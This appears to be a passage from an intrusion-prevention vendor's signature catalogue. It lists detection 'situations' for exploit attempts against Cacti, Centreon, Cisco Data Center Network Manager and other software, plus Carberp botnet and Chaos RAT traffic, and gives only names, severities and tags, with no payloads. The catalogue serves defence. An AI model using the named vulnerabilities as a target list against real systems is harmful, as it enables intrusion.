Last changed: sgpkg-ips-1865-5242
Vulnerability: Cacti-Host_Templates-Template-SQL-Injection-CVE-2024-54146
Description:
Back to top

HTTP_CRL-Cacti-Links.php-Console-Section-Name-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Cacti
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cacti, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1814-5242
Last changed: sgpkg-ips-1814-5242
Vulnerability: Cacti-Links.php-Console-Section-Name-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Cacti-Links.php-Fileurl-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Cacti
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cacti, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1804-5242
Last changed: sgpkg-ips-1804-5242
Vulnerability: Cacti-Links.php-Fileurl-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Cacti-Links.php-Title-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Cacti Group Cacti detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cacti, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1822-5242
Last changed: sgpkg-ips-1822-5242
Vulnerability: Cacti-Links.php-Title-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Cacti-poller_Standard-Error-Log-Path-Arbitrary-File-Read-CVE-2024-45598

About this situation: An attempt to exploit a vulnerability in Cacti
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cacti, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1867-5242
Last changed: sgpkg-ips-1867-5242
Vulnerability: Cacti-poller_Standard-Error-Log-Path-Arbitrary-File-Read-CVE-2024-45598
Description:
Back to top

HTTP_CRL-Cacti-Spikekill-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Cacti Group Cacti detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cacti, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-980-5242
Last changed: sgpkg-ips-991-5242
Vulnerability: Cacti-Spikekill-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Calibre-Python-Code-Injection-CVE-2024-6782

About this situation: An attempt to exploit a vulnerability in the Content Server component of Calibre
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Calibre, CVE2024, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1769-5242
Last changed: sgpkg-ips-1769-5242
Vulnerability: Calibre-Python-Code-Injection-CVE-2024-6782
Description:
Back to top

HTTP_CRL-Cambium-ePMP-1000-Ping-Command-Injection

About this situation: A Cambium ePMP 1000 Ping Command Injection Vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cambium ePMP, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1383-5242
Vulnerability: Cambium-ePMP-1000-Ping-Command-Injection
Description:
Back to top

HTTP_CRL-Campcodes-Thesis-Archiving-System-SQL-Injection-CVE-2023-2149

About this situation: An attempt to exploit a vulnerability in Campcodes Online Thesis Archiving System detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Campcodes Online Thesis Archiving System, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1592-5242
Last changed: sgpkg-ips-1592-5242
Vulnerability: Campcodes-Thesis-Archiving-System-SQL-Injection-CVE-2023-2149
Description:
Back to top

HTTP_CRL-Carberp-Botnet

About this situation: Carberp botnet command and control channel communication detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Carberp, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-373-4219
Last changed: sgpkg-ips-618-5211
Vulnerability: Carberp-Botnet
Description:
Back to top

HTTP_CRL-Carberp-Botnet-Traffic-Detected

About this situation: Carberp Botnet traffic detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Carberp, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: Carberp-Botnet
Description:
Back to top

HTTP_CRL-Carberp-Web-Panel-Remote-Code-Execution

About this situation: Carberp Web Panel Remote Code Execution detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Carberp, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-1013-5242
Vulnerability: Carberp-Web-Panel-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Carel-PlantVisor-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Carel PlantVisor detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Carel PlantVisor, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-609-5211
Vulnerability: Carel-PlantVisor-Directory-Traversal
Description:
Back to top

HTTP_CRL-Cayin-CMS-NTP-Server-RCE

About this situation: An attempt to exploit a vulnerability in Cayin CMS detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, Cayin CMS, CVE2020, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1365-5242
Last changed: sgpkg-ips-1365-5242
Vulnerability: Cayin-CMS-NTP-Server-RCE
Description:
Back to top

HTTP_CRL-Cayin-xPost-wayfinder_seqid-SQLi

About this situation: An attempt to exploit a vulnerability in Cayin xPost detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Cayin xPost, CVE2020, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1289-5242
Last changed: sgpkg-ips-1289-5242
Vulnerability: Cayin-xPost-wayfinder_seqid-SQLi
Description:
Back to top

HTTP_CRL-CentOS-Web-Panel-7-Remote-Code-Execution-CVE-2022-44877

About this situation: An attempt to exploit a vulnerability in CentOS Web Panel detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, CentOS Web Panel, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1544-5242
Last changed: sgpkg-ips-1544-5242
Vulnerability: CentOS-Web-Panel-7-Remote-Code-Execution-CVE-2022-44877
Description:
Back to top

HTTP_CRL-CentOS-Web-Panel-Command-Injection-CVE-2018-18322

About this situation: An attempt to exploit a vulnerability in CentOS Web Panel
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, CentOS Web Panel, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1380-5242
Last changed: sgpkg-ips-1380-5242
Vulnerability: CentOS-Web-Panel-Command-Injection-CVE-2018-18322
Description:
Back to top

HTTP_CRL-Centreon-centreonAuth-Command-Injection

About this situation: An attempt to exploit a vulnerability in Centreon detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Centreon, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-789-5211
Last changed: sgpkg-ips-789-5211
Vulnerability: Centreon-centreonAuth-Command-Injection
Description:
Back to top

HTTP_CRL-Centreon-CSV_hostgrouplogs-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Centreon detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Centreon, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1380-5242
Last changed: sgpkg-ips-1380-5242
Vulnerability: Centreon-CSV_hostgrouplogs-SQL-Injection
Description:
Back to top

HTTP_CRL-Centreon-Generateimage-Index-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Centreon Project Centreon detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Centreon, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1401-5242
Last changed: sgpkg-ips-1401-5242
Vulnerability: Centreon-Generateimage-Index-SQL-Injection
Description:
Back to top

HTTP_CRL-Centreon-Graph-Split-Chartid-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Centreon detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Centreon, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1391-5242
Last changed: sgpkg-ips-1392-5242
Vulnerability: Centreon-Graph-Split-Chartid-SQL-Injection
Description:
Back to top

HTTP_CRL-Centreon-Hostgroupdependency-dep_Id-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Centreon Project Centreon detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Centreon, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1380-5242
Last changed: sgpkg-ips-1380-5242
Vulnerability: Centreon-Hostgroupdependency-dep_Id-SQL-Injection
Description:
Back to top

HTTP_CRL-Centreon-Knowledgebase-Proxy-Proceduresproxy-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Centreon Project Centreon detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Centreon, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1396-5242
Vulnerability: Centreon-Knowledgebase-Proxy-Proceduresproxy-SQL-Injection
Description:
Back to top

HTTP_CRL-Centreon-Metaservice-Meta_Id-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Centreon Project Centreon detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Centreon, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1384-5242
Last changed: sgpkg-ips-1387-5242
Vulnerability: Centreon-Metaservice-Meta_Id-SQL-Injection
Description:
Back to top

HTTP_CRL-Centreon-Nagios-Path-Command-Injection

About this situation: An attempt to exploit a vulnerability in Centreon detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Unix, Linux, Any Hardware, Centreon, CVE2019, Windows not specific, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1352-5242
Last changed: sgpkg-ips-1730-5242
Vulnerability: Centreon-Nagios-Path-Command-Injection
Description:
Back to top

HTTP_CRL-Centreon-poller-Remote-Command-Execution

About this situation: An attempt to exploit a vulnerability in Centreon detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, Centreon, CVE2019, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1237-5242
Last changed: sgpkg-ips-1383-5242
Vulnerability: Centreon-poller-Remote-Command-Execution
Description:
Back to top

HTTP_CRL-Centreon-RRDdatabase_Status_Path-Command-Injection

About this situation: An attempt to exploit a vulnerability in Centreon Project Centreon detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Centreon, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1259-5242
Last changed: sgpkg-ips-1730-5242
Vulnerability: Centreon-RRDdatabase_Status_Path-Command-Injection
Description:
Back to top

HTTP_CRL-Centreon-Web-Centreongraph-Initcurvelist-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Centreon Web
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Centreon, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1780-5242
Last changed: sgpkg-ips-1780-5242
Vulnerability: Centreon-Web-Centreongraph-Initcurvelist-SQL-Injection
Description:
Back to top

HTTP_CRL-Centreon-Web-Formcontactgroup-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Centreon Project Centreon Web detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Centreon, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1542-5242
Last changed: sgpkg-ips-1730-5242
Vulnerability: Centreon-Web-Formcontactgroup-SQL-Injection
Description:
Back to top

HTTP_CRL-Centreon-Web-Insertgraphtemplate-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Centreon Project Centreon Web detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Centreon, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1771-5242
Last changed: sgpkg-ips-1771-5242
Vulnerability: Centreon-Web-Insertgraphtemplate-SQL-Injection
Description:
Back to top

HTTP_CRL-Centreon-Web-Managevmetric-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Centreon Project Centreon Web
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Centreon, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1844-5242
Last changed: sgpkg-ips-1844-5242
Vulnerability: Centreon-Web-Managevmetric-SQL-Injection
Description:
Back to top

HTTP_CRL-Centreon-Web-poller-Broker-Disablcentreonbrokerindb-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Centreon Project Centreon Web detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Centreon, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1557-5242
Last changed: sgpkg-ips-1730-5242
Vulnerability: Centreon-Web-poller-Broker-Disablcentreonbrokerindb-SQL-Injection
Description:
Back to top

HTTP_CRL-Centreon-Web-poller-Broker-Enablecentreonbrokerindb-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Centreon detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Centreon, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1535-5242
Last changed: sgpkg-ips-1730-5242
Vulnerability: Centreon-Web-poller-Broker-Enablecentreonbrokerindb-SQL-Injection
Description:
Back to top

HTTP_CRL-Centreon-Web-poller-Broker-Insertconfig-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Centreon Project Centreon Web detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Centreon, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1532-5242
Last changed: sgpkg-ips-1730-5242
Vulnerability: Centreon-Web-poller-Broker-Insertconfig-SQL-Injection
Description:
Back to top

HTTP_CRL-Centreon-Web-poller-Resource-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Centreon Project Centreon Web detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Centreon, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1525-5242
Last changed: sgpkg-ips-1730-5242
Vulnerability: Centreon-Web-poller-Resource-SQL-Injection
Description:
Back to top

HTTP_CRL-Centreon-Web-Updatecontactservicecommands-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Centreon Project Centreon Web detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Centreon, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1734-5242
Last changed: sgpkg-ips-1734-5242
Vulnerability: Centreon-Web-Updatecontactservicecommands-SQL-Injection
Description:
Back to top

HTTP_CRL-Centreon-Web-Updatedirectory-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Centreon Web detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Centreon, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1720-5242
Last changed: sgpkg-ips-1730-5242
Vulnerability: Centreon-Web-Updatedirectory-SQL-Injection
Description:
Back to top

HTTP_CRL-Centreon-Web-Updatelcarelation-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Centreon Project Centreon Web detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Centreon, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1728-5242
Last changed: sgpkg-ips-1730-5242
Vulnerability: Centreon-Web-Updatelcarelation-SQL-Injection
Description:
Back to top

HTTP_CRL-Centreon-Web-Updateservicehost-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Centreon Project Centreon Web detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Centreon, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1776-5242
Last changed: sgpkg-ips-1776-5242
Vulnerability: Centreon-Web-Updateservicehost-SQL-Injection
Description:
Back to top

HTTP_CRL-Centreon-Web-Updateservicehost_MC-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Centreon Project Centreon Web
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Centreon, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1812-5242
Last changed: sgpkg-ips-1812-5242
Vulnerability: Centreon-Web-Updateservicehost_MC-SQL-Injection
Description:
Back to top

HTTP_CRL-Cgi-Bizdb1-Search-Dbname-Usage

About this situation: Usage of vulnerable variable 'dbname' in bizdb1-search.cgi
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, CNC Technology BizDB, CVE2000, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-506-5211
Vulnerability: HTTP-Bizdb1-Search-Cmd-Exec
Description:
Back to top

HTTP_CRL-CGIWrap-JavaScript-Execution-Attempt

About this situation: JavaScript execution attempt from CGIWrap
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Any Hardware, Nathan Neulinger CGIWrap, CVE2001, Unix not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-130-2032
Last changed: sgpkg-ips-867-5242
Vulnerability: HTTP-CGIWrap-JavaScript-Execution
Description:
Back to top

HTTP_CRL-Chaos-RAT-XSS-To-RCE

About this situation: An attempt to exploit a vulnerability in Chaos Remote Access Tool detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Chaos RAT, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1732-5242
Last changed: sgpkg-ips-1732-5242
Vulnerability: Chaos-RAT-XSS-To-RCE
Description:
Back to top

HTTP_CRL-Chetcpasswd-Buffer-Overflow

About this situation: Detects buffer overflow attempts against Chetcpasswd.cgi
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, Chetcpasswd, CVE2002, Linux not specific, Disclosure, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-113-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Chetcpasswd-Buffer-Overflow
Description:
Back to top

HTTP_CRL-Chipmunk-Forums-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Chipmunk Forums detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Chipmunk Forums, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-684-5211
Last changed: sgpkg-ips-684-5211
Description:
Back to top

HTTP_CRL-CirceOS-SaveWeb-Poll-Remote-Code-Injection-Compromise

About this situation: An attempt to exploit a vulnerability in CirceOS SaveWeb Portal
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, CirceOS SaveWeb, CVE2006, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-343-4219
Last changed: sgpkg-ips-343-4219
Vulnerability: CirceOS-SaveWeb-Portal-Remote-File-Include-Vulnerability
Description:
Back to top

HTTP_CRL-CirceOS-SaveWeb-Poll-Remote-Code-Injection-Compromise-2

About this situation: An attempt to exploit a vulnerability in CirceOS SaveWeb Portal
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, CirceOS SaveWeb, CVE2006, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-343-4219
Last changed: sgpkg-ips-343-4219
Vulnerability: CirceOS-SaveWeb-Portal-Remote-File-Include-Vulnerability
Description:
Back to top

HTTP_CRL-CirceOS-SaveWeb-Site-Path-Remote-Code-Injection-Compromise

About this situation: An attempt to exploit a vulnerability in CirceOS SaveWeb Portal
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, CirceOS SaveWeb, CVE2005, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-343-4219
Last changed: sgpkg-ips-343-4219
Vulnerability: CirceOS-SaveWeb-Portal-Site-Path-Remote-File-Include-Vulnerability
Description:
Back to top

HTTP_CRL-Cisco-Adaptive-Security-Appliance-Cross-Site-Scripting-CVE-2020-3580

About this situation: An attempt to exploit a vulnerability in Cisco Adaptive Security Appliance detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Adaptive Security Appliance, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1381-5242
Last changed: sgpkg-ips-1381-5242
Vulnerability: Cisco-Adaptive-Security-Appliance-Cross-Site-Scripting-CVE-2020-3580
Description:
Back to top

HTTP_CRL-Cisco-ASA-Line-Runner-Malware-Shellcode-Interaction-CVE-2024-20359

About this situation: An attempt to exploit a vulnerability in Cisco Adaptive Security Appliance detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Adaptive Security Appliance, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1722-5242
Last changed: sgpkg-ips-1722-5242
Vulnerability: Cisco-ASA-Line-Runner-Malware-Shellcode-Interaction-CVE-2024-20359
Description: CVE References: CVE-2024-20359
Back to top

HTTP_CRL-Cisco-Data-Center-Network-Manager-Deletereporttemplate-Arbitrary-File-Deletion

About this situation: An attempt to exploit a vulnerability in Cisco Systems Data Center Network Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems Prime Data Center Network Manager, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1228-5242
Last changed: sgpkg-ips-1228-5242
Vulnerability: Cisco-Data-Center-Network-Manager-Deletereporttemplate-Arbitrary-File-Deletion
Description:
Back to top

HTTP_CRL-Cisco-Data-Center-Network-Manager-Getrestorelog-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Cisco Systems Data Center Network Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Data Center Network Manager, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1224-5242
Last changed: sgpkg-ips-1224-5242
Vulnerability: Cisco-Data-Center-Network-Manager-Getrestorelog-Directory-Traversal
Description:
Back to top

HTTP_CRL-Cisco-Data-Center-Network-Manager-Getswitchsdatalength-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Cisco Systems Data Center Network Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Data Center Network Manager, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1266-5242
Last changed: sgpkg-ips-1266-5242
Vulnerability: Cisco-Data-Center-Network-Manager-Getswitchsdatalength-SQL-Injection
Description:
Back to top

HTTP_CRL-Cisco-Data-Center-Network-Manager-Gettokeninfo-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Cisco Systems Data Center Network Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Data Center Network Manager, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1257-5242
Last changed: sgpkg-ips-1257-5242
Vulnerability: Cisco-Data-Center-Network-Manager-Gettokeninfo-SQL-Injection
Description:
Back to top

HTTP_CRL-Cisco-Data-Center-Network-Manager-Installswitchlicense-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Cisco Systems Data Center Network Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Data Center Network Manager, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1258-5242
Last changed: sgpkg-ips-1258-5242
Vulnerability: Cisco-Data-Center-Network-Manager-Installswitchlicense-Directory-Traversal
Description:
Back to top

HTTP_CRL-Cisco-Data-Center-Network-Manager-Persistuserinfo-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Cisco Data Center Network Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Data Center Network Manager, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1244-5242
Last changed: sgpkg-ips-1244-5242
Vulnerability: Cisco-Data-Center-Network-Manager-Persistuserinfo-SQL-Injection
Description:
Back to top

HTTP_CRL-Cisco-Data-Center-Network-Manager-Savelicensefiletoserver-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Cisco Systems Data Center Network Manager detected
